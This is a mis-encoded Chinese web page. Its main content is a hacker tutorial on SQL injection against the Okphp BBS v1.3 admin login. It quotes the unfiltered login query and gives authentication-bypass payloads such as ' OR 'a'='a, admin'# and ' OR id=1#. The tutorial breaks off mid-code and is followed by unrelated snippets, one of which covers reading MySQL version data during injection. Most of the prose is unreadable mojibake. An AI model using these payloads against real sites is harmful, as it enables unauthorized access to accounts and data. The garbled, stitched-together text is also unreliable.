php+mysql×¢ÉäÓï¾ä¹¹Ôì¼¼Êõ
ºÚ¿ÍÈëÃż¼ÊõÖ®php+mysql×¢ÉäÓï¾ä¹¹Ô죺
Ò».ǰÑÔ£º
²âÊÔ°æ±¾ÐÅÏ¢£ºOkphp BBS v1.3 ¿ªÔ´°æ
ÓÉÓÚPHPºÍMYSQL±¾ÉíµÃÔÒò,PHP+MYSQLµÄ×¢ÉäÒª±ÈaspÀ§ÄÑ£¬ÓÈÆäÊÇ×¢ÉäʱÓï¾äµÄ¹¹Ôì·½Ãæ¸üÊǸöÄѵ㣬±¾ÎÄÖ÷ÒªÊǽè¶ÔOkphp BBS v1.3һЩÎļþµÃ¼òµ¥·ÖÎö£¬À´Ì¸Ì¸php+mysql×¢ÉäÓï¾ä¹¹Ô췽ʽ£¬Ï£Íû±¾ÎĶÔÄãÓеã°ïÖú¡£
¡¡¡¡ÉùÃ÷£ºÎÄÕÂËùÓÐÌáµ½µÄ"©¶´"£¬¶¼Ã»Óо¹ý²âÊÔ£¬¿ÉÄܸù±¾²»´æÔÚ£¬ÆäʵÓÐûÓЩ¶´²¢²»ÖØÒª£¬ÖØÒªµÄÊÇ·ÖÎö˼·ºÍÓï¾ä¹¹Ôì¡£
¶þ."©¶´"·ÖÎö£º
1.admin/login.php×¢Éäµ¼ÖÂÈÆ¹ýÉí·ÝÑé֤©¶´£º
´úÂ룺
$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username='$username' and password='$password'";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
$q = "select id,group_id from $user_table where username='$username' and password='$password'"ÖÐ
$username ºÍ $password û¹ýÂË£¬ ºÜÈÝÒ×¾ÍÈÆ¹ý¡£
¶ÔÓÚselect * from $user_table where username='$username' and password='$password'ÕâÑùµÄÓï¾ä¸ÄÔìµÄ·½·¨ÓУº
¹¹Ôì1£¨ÀûÓÃÂß¼ÔËË㣩£º$username=' OR 'a'='a $password=' OR 'a'='a
Ï൱ÓÚsqlÓï¾ä£º
select * from $user_table where username='' OR 'a'='a' and password='' OR 'a'='a'
¹¹Ôì2£¨ÀûÓÃmysqlÀïµÄ×¢ÊÍÓï¾ä# £¬/* °Ñ$password×¢Ê͵ô£©£º$username=admin'#£¨»òadmin'/*)
¼´£º
select * from $user_table where username='admin'#' and password='$password'"
Ï൱ÓÚ£º
select * from $user_table where username='admin'
ÔÚadmin/login.phpÖÐ$qÓï¾äÖеÄ$passwordÔÚ²éѯǰ½øÐÐÁËmd5¼ÓÃÜËùÒÔ²»¿ÉÒÔÓù¹Ôì1ÖеÄÓï¾äÈÆ¹ý¡£ÕâÀïÎÒÃÇÓù¹Ôì2£º
select id,group_id from $user_table where username='admin'#' and password='$password'"
Ï൱ÓÚ£º
select id,group_id from $user_table where username='admin'
Ö»Òª´æÔÚÓû§ÃûΪadminµÄ¾Í³ÉÁ¢£¬Èç¹û²»ÖªµÀÓû§Ãû£¬Ö»ÖªµÀ¶ÔÓ¦µÄid£¬
ÎÒÃǾͿÉÒÔÕâÑù¹¹Ô죺$username=' OR id=1#
Ï൱ÓÚ£º
select id,group_id from $user_table where username='' OR id=1# and password='$password'(#ºóµÄ±»×¢Ê͵ô)
ÎÒÃǽÓ×ÅÍùÏ¿´´úÂ룺
if ($row[0]) {
// If not admin or super moderator
if ($username != "admin" && !eregi("(^|&)3($
Ïà¹ØÎĵµ£º
have been studying parsing JSON from PHP using AJAX to display it in
the client side and jQuery had been a great help to me. Here is a very
simple code in parsing JSON using jQuery that i made.
tablejsondata.php
This file makes the request to a php file and displays the returned data into a tabl ......
CakePHPÊÇÒ»¸ö·Ç³£Ñ¸ËÙPHP¿ò¼Ü£¬ÓÐЧËõ¶Ì¿ª·¢ÖÜÆÚ£¬Äܹ»Áé»îµÄ¼Ü¹¹£¬¿ª·¢£¬Î¬»¤ºÍ²¿ÊðµÄÓ¦ÓóÌÐò¡£Ëü²ÉÓÃÏñMVCÓëORMÒ»ÑùµÄÉè¼ÆÄ£Ê½£¬ÓÐÖúÓÚ½µµÍ¿ª·¢·ÑÓ㬲»ÐèÒª¿ª·¢ÈËÔ±±àдÁËÌ«¶à´úÂë¡£CakePHPÓµÓкܶà´ó¿Í»§£¬±ÈÈ磺MozillaµÄAddons£¬ÃÀ¹úÂéÊ¡Àí¹¤Ñ§ÔºµÄScratch£¬Ò®Â³´óѧµÄÿÈÕÐÂÎÅ¡£
ÍÆ¼öÖ¸Êý£º6ÐǼ¶
ѧϰ³É±¾£ºÒ» ......
¡¾2010/2/4¡¿
1:
·ÅÁË6¸öÎļþÔÚcÅÌÏÂ(php.ini,php5ts.dll,libmysql.dll ,php_gd2.dll,php_mysql.dll,php_mbstring.dll ),Ò»¸öÔÚwindowsÏÂ,ÁíÎå¸öÔÚwindows/system32ÏÂ
2:
ÅäÖÃÁËpath,c:\phpºÍc:\php\ext,(²»¹ýºÃÏóûʲô×÷ÓÃ)
3:
ÃüÁî:httpd.exe -w -n "Apache2" -k start À´²é¿´ÊÇÄÄÒ»ÐеĴíÎóÐÅÏ¢.
×ܽá:µ½ÏÖÔÚ뻅 ......
ÔÚPHP¿ª·¢ÖÐ¶Ô±ÈÆðCookie£¬session ÊÇ´æ´¢ÔÚ·þÎñÆ÷¶ËµÄ»á»°£¬Ïà¶Ô°²È«£¬²¢ÇÒ²»Ïñ Cookie ÄÇÑùÓд洢³¤¶ÈÏÞÖÆ£¬±¾Îļòµ¥½éÉÜ session µÄʹÓá£
¡¡¡¡ÓÉÓÚ Session ÊÇÒÔÎı¾ÎļþÐÎʽ´æ´¢ÔÚ·þÎñÆ÷¶ËµÄ£¬ËùÒÔ²»Å¿ͻ§¶ËÐÞ¸Ä Session ÄÚÈÝ¡£Êµ¼ÊÉÏÔÚ·þÎñÆ÷¶ËµÄ Session Îļþ£¬PHP ×Ô¶¯ÐÞ¸Ä session ÎļþµÄȨÏÞ£¬Ö»±£ÁôÁËϵͳ¶ÁºÍ ......
µ±×¢Éämysql¿âµÄÊäÈëµãµÄʱºò,ÎÒÃÇ¿ÉÒÔͨ¹ýversion()/user()/database()/password()µÈÄÚÖú¯ÊýÀ´µÃµ½mysqlµÄÏà¹ØÐÅÏ¢,ÆäʵÎÒÃÇÔÚ×¢ÉäµÄʱºò¿ÉÒÔÀûÓÃmysqlÄÚÖõıäÁ¿À´µÃµ½¸ü¶àµÄmysqlÐÅÏ¢
ÆäÖÐversion()¿ÉÒÔд³É@@versionÀ´°Ñversionµ±×ö±äÁ¿À´¶ÁÈ¡,ÕâÑùÒ»Ñù¿ÉÒԵõ½,ÆäËûµÄÄÚÖÃÊDz»¿ÉÒÔд³É±äÁ¿µÄÐÎʽ.
´ó¼Ò¶¼Ó¦¸ÃÓùýÀû ......